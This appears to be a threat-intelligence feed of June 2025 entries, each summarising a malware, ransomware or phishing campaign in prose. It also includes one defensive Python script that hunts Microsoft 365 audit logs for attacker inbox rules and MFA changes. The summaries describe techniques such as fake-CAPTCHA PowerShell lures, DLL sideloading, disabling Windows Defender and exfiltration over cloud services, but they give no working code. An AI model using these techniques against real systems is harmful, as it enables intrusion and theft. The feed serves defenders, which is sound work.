Researchers at Securonix have uncovered an ongoing campaign named SERPENTINE#CLOUD leveraging Cloudflare Tunnel to secretly deliver Python-based malware. The attack starts with phishing emails containing ZIP archives that include malicious .LNK shortcut files disguised as invoice-themed PDFs. When clicked, these shortcuts execute hidden scripts that connect to attacker-controlled Cloudflare domains using WebDAV to download additional malicious files. The infection chain proceeds through VBScript and batch files, eventually leading to Python-based loaders that execute malware directly in memory using Donut shellcode. The malware employs advanced obfuscation techniques, including character encoding, base64 and a Python binary packer called Kramer. The final payload includes RATs like AsyncRAT or RevengeRAT, which give attackers full control over compromised machines. The campaign has been observed targeting victims in the U.S., U.K., Germany and other Western countries.
Source: https://www.securonix.com/blog/analyzing_serpentinecloud-threat-actors-abuse-cloudflare-tunnels-threat-research/
2025-06-20
CAPTCHA_Campaigns_Deliver_Malware
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
CAPTCHA_Campaigns_Deliver_Malware
Date of Scan:
2025-06-20
Impact:
LOW
Summary:
Elastic researchers have identified a surge in ClickFix-based social engineering campaigns throughout 2025. These campaigns leverage deceptive CAPTCHA verification pages to trick users into executing malicious PowerShell commands. These campaigns initiate a multi-stage infection chain that delivers a RAT and infostealer called ARECHCLIENT2, also known as SectopRAT. The infection begins when a user interacts with the fake CAPTCHA page, leading to the execution of the GHOSTPULSE loader. It employs DLL sideloading to evade detection and delivers an encrypted payload. GHOSTPULSE runs a .NET-based loader that disables Windows security checks, decrypts embedded malware and loads ARECHCLIENT2 directly into system memory. It targets credentials, cryptocurrency wallets and browser data, performs system reconnaissance, and establishes persistent remote access.
Source: https://www.elastic.co/security-labs/a-wretch-client
2025-06-20
AsyncRAT_Campaign
MEDIUM
+
Intel Source:
Halcyon
Intel Name:
AsyncRAT_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
Researchers at Halcyon have identified a financially motivated cybercriminal group conducting a widespread phishing campaign leveraging commodity RATs such as AsyncRAT, XWorm and Remcos. The campaign has been active since early 2024 and targets organizations globally across all sectors. The attack starts with phishing emails linking to Dropbox-hosted ZIP files that initiate a multi-stage infection process involving .URL and .LNK files, obfuscated batch scripts, and Python-based loaders. The attackers use temporary TryCloudflare tunnels to deliver the final malware payloads. These tunnels allow them to bypass traditional network defenses by exploiting legitimate services to hide their activity. The malware uses Python scripts to run from memory and uncommon system folders to evade both EPP and EDR solutions. The threat actors appear to function as initial access brokers, potentially selling access or deploying ransomware.
Source: https://www.halcyon.ai/blog/asyncrat-campaign-continues-to-evade-endpoint-detection
2025-06-19
BERT_Ransomware_Targets_Windows_and_Linux
MEDIUM
+
Intel Source:
The Raven File
Intel Name:
BERT_Ransomware_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
MEDIUM
Summary:
Researchers at The Raven File have identified a new ransomware operation, known as BERT, which has been active since at least mid-March 2025. The group, which employs double extortion tactics, initially targeted Windows systems but expanded its capabilities in May 2025 to include a Linux variant that shares an 80% codebase match with the notorious REvil ransomware. Gaining initial access via phishing, the attackers deploy a multi-stage attack chain beginning with a PowerShell script that disables system defenses, including Windows Defender, the firewall, and UAC. Once security controls are neutralized, the ransomware payload is downloaded from Russian-controlled infrastructure and executed. Victims are geographically diverse, with a focus on the Service and Manufacturing sectors in the US, UK, and Asia.
Source: https://theravenfile.com/2025/06/16/bert-ransomware/
2025-06-19
Chaos_RAT_Targets_Windows_and_Linux
LOW
+
Intel Source:
Polyswarm
Intel Name:
Chaos_RAT_Targets_Windows_and_Linux
Date of Scan:
2025-06-19
Impact:
LOW
Summary:
Researchers from Acronis have uncovered new variants of the Chaos RAT, which has evolved from an open-source project into a versatile, cross-platform malware threat. Active campaigns since June 2025 target both Windows and Linux systems via phishing emails containing malicious PDF files. These documents lure users into clicking embedded links, initiating a multi-stage infection chain that deploys the final RAT payload. The malware's objectives are financial gain through the deployment of cryptominers and data theft, leveraging capabilities including keylogging, screen capture, file exfiltration, and full remote command execution. Chaos RAT employs complex obfuscation and anti-analysis techniques, such as checking for virtualized environments, to evade detection and hinder reverse engineering. Its ability to compromise both major operating systems with a full suite of intrusive tools creates a significant risk of data breaches and system degradation for a broad range of organizations.
Source: https://blog.polyswarm.io/new-chaos-rat-variants-observed
2025-06-18
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Qilin_RaaS_Fills_Ransomware_Power_Vacuum
Date of Scan:
2025-06-18
Impact:
MEDIUM
Summary:
Researchers from Cybereason have observed the Qilin ransomware-as-a-service (RaaS) operation emerging to fill a power vacuum created by the collapse of other major ransomware groups in early 2025. Qilin has been active since late 2022 but is rapidly gaining dominance by offering a sophisticated, full-service cybercrime platform to its affiliates. The operation uses cross-platform malware written in Rust for Windows and C for Linux to target a wide range of systems, with a specific focus on enterprise virtualization environments like VMware ESXi and Nutanix. Attackers gain initial access, then use tools like PsExec for lateral movement, abuse PowerShell for privilege escalation, and execute scripts to disable hypervisor functions, terminate virtual machines, and delete backups before encrypting data.
Source: https://www.cybereason.com/blog/threat-alert-qilin-seizes-control
2025-06-18
MySQL_RAT_Campaign
LOW
+
Intel Source:
ASEC
Intel Name:
MySQL_RAT_Campaign
Date of Scan:
2025-06-18
Impact:
LOW
Summary:
Researchers at ASEC have uncovered an ongoing campaign targeting improperly secured MySQL servers, primarily those running on Windows systems. The attackers exploit exposed port 3306/TCP using brute-force and dictionary attacks to gain administrative access. Once compromised, they install various types of malware, including GhostRAT, XWorm, HpLoader, and User Defined Function (UDF) based files. The use of UDF DLLs allows attackers to execute commands, download files, and load malware directly into memory. GhostRAT variants like GhostCringe and HiddenGh0st are capable of privilege escalation and screen capture, while XWorm, a modified remote access tool, can steal credentials, spread through USB devices and capture clipboard data. The attackers have also used legitimate tools like Zoho ManageEngine agents to maintain access without using traditional backdoors.
Source: https://asec.ahnlab.com/ko/88468/
2025-06-17
Kimsuky_Targets_Academics_via_Phishing_Campaign
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Kimsuky_Targets_Academics_via_Phishing_Campaign
Date of Scan:
2025-06-17
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a new phishing campaign by the North Korean state-sponsored group Kimsuky targeting professionals by impersonating thesis reviewers. They send phishing emails containing malicious password-protected Hangul Word Processor (HWP) documents. When the victim opens the file and enables content, it drops multiple files into the system's temporary directory, including a BAT script that initiates a multi-stage infection process. This process installs a PowerShell script that collects system and antivirus data, exfiltrates the data to a Dropbox account controlled by the attackers and downloads additional payloads. The malware also abuses the legitimate remote access software AnyDesk by replacing its configuration files with attacker-controlled versions, so that all visual signs such as tray icons and windows are hidden. Additionally, the attackers leverage scheduled task abuse, encoded payloads, and a step-by-step method to stay hidden and maintain access.
Source: https://asec.ahnlab.com/ko/88419/
2025-06-17
Go_Based_SSH_Botnet_Targets_Linux_Systems
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Go_Based_SSH_Botnet_Targets_Linux_Systems
Date of Scan:
2025-06-17
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified a global, automated attack campaign targeting internet-exposed Linux systems with weak SSH credentials. The threat actor, utilizing a Go-based tool, brute-forces access and executes a multi-stage infection to establish persistent control. Observed on April 29, 2025, the attack involves deploying architecture-specific malware variants for ARM and x86 systems, indicating a clear focus on compromising a wide range of devices, including the Internet of Things (IoT) ecosystem. After gaining initial access, the attacker installs an SSH key backdoor and uses the chattr command to make the authorized_keys file immutable, significantly hindering remediation efforts.
Source: https://isc.sans.edu/diary/rss/32024
2025-06-16
Fileless_AsyncRAT_via_Clickfix_Lure
LOW
+
Intel Source:
cloudsek
Intel Name:
Fileless_AsyncRAT_via_Clickfix_Lure
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at CloudSEK have identified an active fileless malware campaign distributing AsyncRAT to German-speaking users. The attack, ongoing since at least April 2025, begins with a Clickfix-themed website that socially engineers victims into executing a malicious PowerShell command through a fake CAPTCHA prompt. The initial command downloads a second-stage, obfuscated PowerShell script, which then decodes and reflectively loads a C# AsyncRAT payload directly into memory, evading file-based detection. The malware leverages legitimate system utilities like conhost.exe and PowerShell for stealthy execution, establishes persistence via RunOnce registry keys, and communicates with a command-and-control server over TCP port 4444.
Source: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users
2025-06-16
ClickFix_Social_Engineering_Attack_Chain
LOW
+
Intel Source:
Darktrace
Intel Name:
ClickFix_Social_Engineering_Attack_Chain
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Darktrace have observed threat actors, including APT groups like APT28 and MuddyWater, leveraging a social engineering tactic dubbed "ClickFix" to gain initial access and exfiltrate data from organizations. This prolific campaign, observed in early 2025 across EMEA and the United States, targets the human user as the weakest link through phishing or malvertising that directs victims to a fake prompt, such as a CAPTCHA or error message. These prompts trick users into manually executing a malicious PowerShell command, which establishes command and control (C2) communication. This allows attackers to download secondary payloads like XWorm or Lumma, move laterally, and exfiltrate sensitive system information.
Source: https://www.darktrace.com/blog/unpacking-clickfix-darktraces-detection-of-a-prolific-social-engineering-tactic
2025-06-16
Katz_Stealer
LOW
+
Intel Source:
Picussecurity
Intel Name:
Katz_Stealer
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Picus have uncovered a new information-stealing malware-as-a-service (MaaS), Katz Stealer, which emerged in 2025. The malware is distributed via phishing campaigns and trojanized software. It leverages a multi-stage infection chain that includes obfuscated JavaScript droppers, PowerShell loaders and .NET-based UAC bypass techniques. The malware runs entirely in memory, hides inside legitimate Windows processes and uses images to secretly run malicious code. Once inside the system, it targets web browsers like Chrome and Firefox, email accounts, VPN services, file transfer programs and cryptocurrency wallets. Additionally, it takes control of Discord by injecting malicious code that runs every time the app starts, giving attackers remote access to the system.
Source: https://www.picussecurity.com/resource/blog/understanding-katz-stealer-malware-and-its-credential-theft-capabilities
2025-06-16
Spectra_Ransomware_Double_Extortion
MEDIUM
+
Intel Source:
K7 Labs
Intel Name:
Spectra_Ransomware_Double_Extortion
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from K7 Security Labs have observed Spectra Ransomware, an emerging double-extortion threat targeting Windows-based systems. Attackers demand a $5,000 Bitcoin payment within a 72-hour deadline, threatening to leak stolen data if victims do not comply. The malware achieves persistence by creating a Run registry key and masquerading as svchost.exe in the AppData folder.
Source: https://labs.k7computing.com/index.php/the-spectre-of-spectraransomware/
2025-06-16
APT41_Uses_Google_Calendar_for_C2
MEDIUM
+
Intel Source:
Resecurity
Intel Name:
APT41_Uses_Google_Calendar_for_C2
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Resecurity have uncovered that the Chinese state-sponsored threat actor APT41, which is involved in both espionage and cybercrime, has launched a new campaign leveraging Google Calendar as a covert C2 channel. The threat actor gains initial access through spear phishing emails containing a ZIP archive disguised as export documentation, which includes malicious LNK files and decoy images. Upon execution, a series of malware components (PLUSDROP, PLUSINJECT, and TOUGHPROGRESS) activate and run directly in the system's memory, using process hollowing and hiding inside legitimate system processes to avoid detection. The final payload, TOUGHPROGRESS, communicates with attacker-controlled Google Calendar events to receive commands and sends stolen data back by writing it into new calendar entries. This malware is highly advanced and capable of altering the Windows operating system, which could allow the attackers to take full control of the system and erase traces of their activity.
Source: https://www.resecurity.com/blog/article/apt-41-threat-intelligence-report-and-malware-analysis
2025-06-16
Anubis_RaaS_Group
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Anubis_RaaS_Group
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Trend Micro researchers have discovered a new ransomware strain called Anubis, which operates as a ransomware-as-a-service (RaaS) operation active since December 2024. It includes a file-wiping feature alongside traditional encryption, creating a dual-threat approach that puts extra pressure on victims to pay the ransom. Anubis affiliates gain access through spear-phishing campaigns and leverage advanced techniques such as privilege escalation, access token manipulation and shadow copy deletion to prevent recovery. Anubis has targeted organizations in various sectors, especially healthcare and construction, with confirmed attacks in countries including Australia, Canada, Peru and the U.S. The group operates on cybercrime forums such as RAMP and XSS, offering flexible affiliate programs to other cybercriminal groups.
Source: https://www.trendmicro.com/en_us/research/25/f/anubis-a-closer-look-at-an-emerging-ransomware.html
2025-06-16
Mamba2FA_Credential_Harvesting_Campaign
LOW
+
Intel Source:
Spider Labs
Intel Name:
Mamba2FA_Credential_Harvesting_Campaign
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers at SpiderLabs have identified an active phishing campaign leveraging a Phishing-as-a-Service (PhaaS) kit known as Mamba2FA. The attack begins with a lure themed as a "Secure Document Portal," designed to trick victims into entering their email address to access a purported document. Upon submission, the user is redirected to a counterfeit Microsoft login page for credential harvesting. The use of a PhishKit and PhaaS infrastructure indicates a commoditized and scalable threat, enabling less-skilled actors to deploy effective attacks.
Source: https://x.com/SpiderLabs/status/1932844577355939890
2025-06-16
Water_Curse_GitHub_Malware_Campaign
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Water_Curse_GitHub_Malware_Campaign
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have uncovered a broad supply chain campaign conducted by a financially motivated threat actor tracked as Water Curse, targeting developers, security professionals, and gamers. The actor leverages at least 76 weaponized GitHub repositories to deliver multistage malware. The initial attack vector involves tricking users into downloading and compiling seemingly legitimate open-source tools, where malicious code embedded in Visual Studio project files executes during the build process. This initiates a complex infection chain using VBS and PowerShell scripts to deploy an Electron-based backdoor, which performs privilege escalation through UAC bypass, establishes persistence via scheduled tasks, and disables security defenses like Windows Defender and Volume Shadow Copies.
Source: https://www.trendmicro.com/en_us/research/25/f/water-curse.html
2025-06-16
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
LOW
+
Intel Source:
Securelist
Intel Name:
Mirai_Variant_Exploits_DVRs_via_CVE_2024_3721
Date of Scan:
2025-06-16
Impact:
LOW
Summary:
Researchers from Securelist have observed a new Mirai botnet variant actively exploiting a remote code execution vulnerability (CVE-2024-3721) in internet-exposed TBK DVR devices. The campaign uses a crafted POST request to download and execute a malicious ARM32 binary, immediately compromising the device without reconnaissance. The malware is a Mirai variant enhanced with anti-evasion features, including RC4-encrypted strings and checks to detect virtualization and emulation environments.
Source: https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
2025-06-16
Hive0131_Targets_Latin_America
MEDIUM
+
Intel Source:
IBM X-Force
Intel Name:
Hive0131_Targets_Latin_America
Date of Scan:
2025-06-16
Impact:
MEDIUM
Summary:
Researchers at IBM X-Force have identified a surge in cyber-attacks involving DCRat across Latin America. These attacks are attributed to the financially motivated threat group Hive0131. The group sends phishing emails impersonating Colombian judicial entities to trick recipients into clicking malicious links embedded in PDFs and Google Docs to initiate infection chains. These phishing campaigns deliver DCRat, a Malware-as-a-Service (MaaS) tool, via obfuscated loaders such as VMDetectLoader, which employs virtual machine detection, AMSI bypass and process hollowing to evade detection. The malware is capable of surveillance, data exfiltration, command execution and persistence through scheduled tasks or registry keys. Researchers also observed that the attackers use various methods such as JavaScript and VBScript to distribute the malware. Hive0131 appears to have shifted from traditional RATs like QuasarRAT and NjRAT to more advanced payloads like DCRat, which makes detection and removal more difficult.
Source: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america
2025-06-12
Italian_Remcos_Malware_Campaign
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
Italian_Remcos_Malware_Campaign
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified a malware campaign targeting Italy, active around June 10-11, 2025. Threat actors are distributing the Remcos Remote Access Trojan (RAT) via email, using malicious ZIP file attachments. The campaign leverages a financial lure with an email subject of "AV: Avviso di pagamento" (Payment notice) to trick recipients into executing the payload. The use of the "ModiLoader" tag suggests a potential multi-stage infection chain. The primary motivation appears to be financial, using the RAT's capabilities for credential theft, data exfiltration, and full remote control of compromised systems.
Source: https://cert-agid.gov.it/wp-content/uploads/2025/06/remcos-11-06-2025.json
2025-06-12
Arkana_Ransomware_Exfiltrates_Brokerage_Data
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Arkana_Ransomware_Exfiltrates_Brokerage_Data
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researchers from ASEC have observed the Arkana ransomware group claiming responsibility for a significant data breach targeting a UK-based global online brokerage firm. The group exfiltrated approximately 50 GB of data, including sensitive Know Your Customer (KYC) records and customer information, and threatened to leak or sell the dataset if a ransom was not paid by June 10, 2025. This double-extortion attack, publicized on the group's dedicated leak site, was focused on monetizing the stolen information. The incident highlights a severe threat to the financial sector, where exfiltrated KYC data presents a high risk of identity theft and fraud.
Source: https://asec.ahnlab.com/en/88437/
2025-06-12
DCRat_Targeting_Blockchain_Users
LOW
+
Intel Source:
Qi'anxin Threat Intelligence Center
Intel Name:
DCRat_Targeting_Blockchain_Users
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team have identified a financially motivated campaign targeting blockchain and cryptocurrency users. Unknown attackers deliver a malicious ZIP archive containing a shortcut file (LNK) via the Telegram messaging application. Execution of the lure file initiates a multi-stage infection process that uses VBScript and PowerShell to download components from cloud storage. The attack leverages DLL side-loading, using legitimately signed executables to load a malicious DLL, which then loads and injects the DCRat remote access trojan (RAT) into memory. This methodology is designed to evade detection by traditional security tools. The attackers' infrastructure also hosts fraudulent cryptocurrency investment websites, indicating the primary objective is theft.
Source: https://ti.qianxin.com/blog/articles/counterfeiting-qianxin-certificates-targeted-attacks-against-blockchain-customers-en/
2025-06-12
Winos_4_0_Behind_Operation_Holding_Hands
MEDIUM
+
Intel Source:
somedieyoungZZ
Intel Name:
Winos_4_0_Behind_Operation_Holding_Hands
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Researcher somedieyoungZZ has detailed the 'Operation Holding Hands' campaign, a multi-stage attack attributed to the China-linked Silver Fox APT group. Targeting users in Japan and Taiwan, the campaign begins with a phishing lure: a digitally signed executable masquerading as a salary revision notice. This initial payload leverages its stolen certificate to appear legitimate while it drops and unpacks subsequent stages using COM objects. The malware employs sophisticated evasion techniques, including DLL search order hijacking and dynamic API resolution via configuration files, to minimize its forensic footprint. The final payload is a memory-resident backdoor, identified as Winos 4.0, which connects to hardcoded C2 infrastructure for persistent access and espionage.
Source: https://somedieyoungzz.github.io/posts/silver-fox/
2025-06-12
Fog_Ransomware_Employs_Unusual_Toolset
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Fog_Ransomware_Employs_Unusual_Toolset
Date of Scan:
2025-06-12
Impact:
MEDIUM
Summary:
Symantec researchers have reported an attack against a financial institution in Asia involving the Fog ransomware. The operators demonstrated an unusual methodology, blending ransomware deployment with espionage-style tactics. After an approximate two-week dwell time, the attackers deployed a unique toolset including the legitimate employee monitoring software Syteca for spying, and open-source C2 frameworks like GC2 and Adaptix for command and control. Notably, the threat actors established persistence via a new service after deploying the ransomware, a clear deviation from typical smash-and-grab ransomware behavior. This post-encryption activity suggests a dual motive: the ransomware may have been a decoy for a more persistent espionage operation, or an opportunistic monetization of an existing intrusion.
Source: https://www.security.com/threat-intelligence/fog-ransomware-attack
2025-06-12
Quasar_RAT_via_Obfuscated_Batch_Files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Quasar_RAT_via_Obfuscated_Batch_Files
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers at ISC.SANS have identified an active campaign delivering the Quasar Remote Access Trojan (RAT) through a multi-stage infection process. Threat actors initiate the attack with a simple batch script that opens a decoy document to deceive the user while concurrently using PowerShell to download and execute a second, heavily obfuscated batch file.
Source: https://isc.sans.edu/diary/rss/32036
2025-06-12
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
LOW
+
Intel Source:
Securelist
Intel Name:
BrowserVenom_Spreads_Via_Fake_AI_Download_Ads
Date of Scan:
2025-06-12
Impact:
LOW
Summary:
Researchers from Securelist have identified a malware campaign that exploits interest in the DeepSeek-R1 LLM to distribute an implant dubbed BrowserVenom. The threat actors, believed to be Russian-speaking based on code comments, use malicious online ads so that people searching for DeepSeek-R1 are redirected to a fake site that delivers a trojanized installer named AI_Launcher_1.21.exe. When executed, the file starts a multi-stage infection process involving fake CAPTCHA screens and PowerShell-based defence evasion, then downloads and installs the final payload, BrowserVenom, which installs a malicious certificate and silently reconfigures all major web browsers to route traffic through an attacker-controlled proxy. Infections have been observed in Brazil, Cuba, Mexico, India, Nepal, South Africa and Egypt, showing a wide geographical distribution.
Source: https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/
2025-06-11
Transparent_Tribe_DISGOMOJI_Targeting_Linux
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
Transparent_Tribe_DISGOMOJI_Targeting_Linux
Date of Scan:
2025-06-11
Impact:
MEDIUM
Summary:
The 360 Threat Intelligence Center has revealed a new espionage campaign by the South Asian threat actor APT-C-56, also known as Transparent Tribe. The group is targeting Indian government and military personnel with a multi-stage DISGOMOJI malware variant built for Linux systems. Initial access is gained through social engineering: users are tricked into running a Golang ELF loader disguised as a password utility for a lure PDF document. The attack chain uses Google Drive for payload delivery and Google Cloud Platform for command-and-control, so the traffic blends in with legitimate cloud usage and bypasses traditional network defences. Once established, the final payload steals system information, exfiltrates documents, harvests Firefox browser credentials, and deploys the MeshAgent remote access tool for long-term persistence.
Source: https://www.ctfiot.com/253976.html
2025-06-11
CYBEREYE_RAT
LOW
+
Intel Source:
Cyfirma
Intel Name:
CYBEREYE_RAT
Date of Scan:
2025-06-11
Impact:
LOW
Summary:
Cyfirma researchers have identified a new .NET-based malware called CyberEye, also known as TelegramRAT, which is actively distributed through a GitHub repository and Telegram channels operated by threat actors using the aliases @cisamu123 and @CodQu. The malware is deployed through a GUI-based builder that enables low-skill cybercriminals to generate customised payloads with features such as keylogging, credential theft, clipboard hijacking and persistence mechanisms. CyberEye uses Telegram as its command-and-control channel, so the operators do not need to run their own servers. It turns off Windows Defender through system settings and PowerShell commands and attempts to gain higher privileges. It steals saved passwords from browsers and session data from apps such as Telegram, Discord and Steam, and sends sensitive files and screenshots back to the attacker.
Source: https://www.cyfirma.com/research/understanding-cybereye-rat-builder-capabilities-and-implications/
2025-06-11
FIN6_Delivers_More_Eggs_Malware
MEDIUM
+
Intel Source:
DTI
Intel Name:
FIN6_Delivers_More_Eggs_Malware
Date of Scan:
2025-06-11
Impact:
MEDIUM
Summary:
DTI researchers have uncovered a phishing campaign conducted by the financially motivated group Skeleton Spider, also tracked as FIN6, that leverages deceptive job-application lures to distribute the More_Eggs malware. The group initiates contact with recruiters on professional job platforms such as LinkedIn and Indeed, impersonating job seekers. They send phishing messages containing links to fake resume websites that appear legitimate but are controlled by the attackers. These fraudulent sites are registered anonymously and hosted on trusted cloud services such as AWS. The attackers use CAPTCHA challenges, IP-address filtering and behavioural checks to deliver malicious ZIP files only to selected targets. The payload chain includes a disguised .LNK file that executes JavaScript via wscript.exe, enabling credential theft, command execution and the installation of follow-on payloads such as ransomware. FIN6 abuses cloud services such as Amazon CloudFront and S3 to obscure the origin of the attack and evade detection.
Source: https://dti.domaintools.com/Skeleton-Spider-Trusted-Cloud-Malware-Delivery/
2025-06-10
SharePoint_Phishing_Exploits_Trusted_Links
MEDIUM
+
Intel Source:
CyberProof
Intel Name:
SharePoint_Phishing_Exploits_Trusted_Links
Date of Scan:
2025-06-10
Impact:
MEDIUM
Summary:
CyberProof researchers have observed a significant surge in phishing campaigns that abuse legitimate Microsoft SharePoint links to evade detection and harvest credentials. Attackers leverage the inherent trust users and security tools place in SharePoint URLs to deliver multi-stage credential-harvesting pages. These attacks are increasingly sophisticated, often requiring the specific victim's email address and a legitimate Microsoft-sent one-time code to proceed, which foils automated analysis. Following a successful compromise, threat actors have been observed registering their own multi-factor authentication (MFA) methods on the account and creating malicious inbox rules to maintain persistence and further infiltrate the organisation.
Source: https://www.cyberproof.com/blog/deceptive-links-unmasking-sharepoint-phishing-attacks/
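The post-compromise persistence described above (attacker-registered MFA methods and malicious inbox rules) leaves traces in the Microsoft 365 Unified Audit Log that can be hunted. The following is an added example, not CyberProof's code: it scans audit records for inbox rules that delete, forward or bury mail and for "Update user." events that touch MFA registration properties. Record fields follow the Unified Audit Log schema (Exchange cmdlet records carry Operation and Parameters; Entra ID records carry Operation and ModifiedProperties); the sample records, users, IP addresses and rule names are constructed placeholders.

```python
"""Post-compromise persistence hunting in Microsoft 365 Unified Audit Log records.

Added example, not CyberProof's code. Record shapes follow the Unified Audit
Log schema; SAMPLE_RECORDS are constructed and contain no real users or IPs.
"""
from __future__ import annotations

import re

RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
# Folders attackers use to bury mail the victim would otherwise notice.
HIDE_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "junk email",
                "deleted items", "conversation history"}
# Keywords attackers filter on to suppress security and finance notifications.
SUPPRESS_WORDS = re.compile(r"password|security|hack|phish|suspicious|invoice|payment|wire", re.I)
MFA_PROPS = {"StrongAuthenticationMethod", "StrongAuthenticationPhoneAppDetail",
             "StrongAuthenticationUserDetails"}


def _params(rec: dict) -> dict[str, str]:
    """Flatten the Exchange cmdlet Parameters list into a name -> value map."""
    return {p.get("Name", ""): str(p.get("Value", "")) for p in rec.get("Parameters", [])}


def inbox_rule_reasons(rec: dict) -> list[str]:
    """Why an inbox-rule creation or modification looks like attacker persistence."""
    if rec.get("Operation") not in RULE_OPS:
        return []
    p = _params(rec)
    reasons: list[str] = []
    if p.get("DeleteMessage", "").lower() == "true":
        reasons.append("deletes matching mail")
    for name in FORWARD_PARAMS:
        if p.get(name):
            reasons.append(f"forwards mail via {name}={p[name]}")
    # MoveToFolder is logged as "user@domain:\Folder"; keep the folder part only.
    folder = p.get("MoveToFolder", "").rsplit("\\", 1)[-1].lower()
    if folder in HIDE_FOLDERS:
        reasons.append(f"moves mail to '{folder}'")
    words = p.get("SubjectContainsWords", "") + " " + p.get("BodyContainsWords", "")
    if SUPPRESS_WORDS.search(words):
        reasons.append("filters on security/finance keywords")
    return reasons


def mfa_methods_changed(rec: dict) -> list[str]:
    """MFA registration properties touched by an Entra ID 'Update user.' event."""
    if rec.get("Operation") != "Update user.":
        return []
    return [m.get("Name", "") for m in rec.get("ModifiedProperties", []) if m.get("Name") in MFA_PROPS]


def find_persistence(records: list[dict]) -> list[dict]:
    """One finding per record that shows inbox-rule or MFA-method persistence."""
    findings: list[dict] = []
    for rec in records:
        reasons = inbox_rule_reasons(rec)
        if reasons:
            findings.append({"type": "inbox_rule", "user": rec.get("UserId"),
                             "client_ip": rec.get("ClientIP"), "reasons": reasons})
        props = mfa_methods_changed(rec)
        if props:
            findings.append({"type": "mfa_method_changed", "target": rec.get("ObjectId"),
                             "actor": rec.get("UserId"), "properties": props})
    return findings


SAMPLE_RECORDS = [  # constructed audit records, not from the report
    {"Operation": "New-InboxRule", "Workload": "Exchange", "UserId": "jdoe@corp.example",
     "ClientIP": "203.0.113.10", "Parameters": [
         {"Name": "Name", "Value": "."},
         {"Name": "SubjectContainsWords", "Value": "password;security alert;invoice"},
         {"Name": "MoveToFolder", "Value": "jdoe@corp.example:\\RSS Subscriptions"},
         {"Name": "MarkAsRead", "Value": "True"},
         {"Name": "DeleteMessage", "Value": "True"}]},
    {"Operation": "Update user.", "Workload": "AzureActiveDirectory", "UserId": "jdoe@corp.example",
     "ObjectId": "jdoe@corp.example", "ModifiedProperties": [
         {"Name": "StrongAuthenticationMethod", "OldValue": "[]", "NewValue": "[{\"MethodType\":6}]"},
         {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "StrongAuthenticationMethod"}]},
    {"Operation": "Set-InboxRule", "Workload": "Exchange", "UserId": "asmith@corp.example",
     "ClientIP": "198.51.100.7", "Parameters": [
         {"Name": "Identity", "Value": "Team updates"},
         {"Name": "MoveToFolder", "Value": "asmith@corp.example:\\Projects"}]},
]

if __name__ == "__main__":
    for finding in find_persistence(SAMPLE_RECORDS):
        print(finding)
```

In practice the records come from Search-UnifiedAuditLog or the Office 365 Management Activity API; a finding for an inbox rule should be correlated with the ClientIP of the sign-in that preceded it, since the phishing kit's session typically originates from an address the user has never used.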
2025-06-10
DanaBot_C2_Memory_Leak_DanaBleed
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
DanaBot_C2_Memory_Leak_DanaBleed
Date of Scan:
2025-06-10
Impact:
MEDIUM
Summary:
Zscaler researchers have discovered a critical memory leak vulnerability, dubbed "DanaBleed," within the command-and-control (C2) infrastructure of the DanaBot Malware-as-a-Service (MaaS) platform. Introduced in a June 2022 software update, a programming error in the Delphi-based C2 server caused it to append uninitialized memory to network responses, leaking sensitive data until early 2025. This flaw, comparable to the 2014 Heartbleed bug, exposed the group's internal operations, including threat actor credentials, backend infrastructure IPs and onion domains, private cryptographic keys, and exfiltrated victim information.
Source: https://www.zscaler.com/blogs/security-research/danableed-danabot-c2-server-memory-leak-bug
2025-06-10
SoraAI_Clickbait_InfoStealer
LOW
+
Intel Source:
K7 Labs
Intel Name:
SoraAI_Clickbait_InfoStealer
Date of Scan:
2025-06-10
Impact:
LOW
Summary:
According to analysis by K7 Labs, an information stealer is being distributed using social engineering tactics that leverage interest in generative AI tools. The campaign, first observed in late May 2025, begins when a user executes a malicious shortcut file (.lnk) masquerading as OpenAI's Sora. This initiates a multi-stage download process using PowerShell to fetch payloads from a public GitHub repository. The final payload is a comprehensive Python-based stealer that establishes persistence and proceeds to harvest a wide array of sensitive data, including browser credentials, cookies, credit card details, cryptocurrency wallets, gaming platform session data, and sensitive files from the victim's machine.
Source: https://labs.k7computing.com/index.php/a-soraai-clickbait/
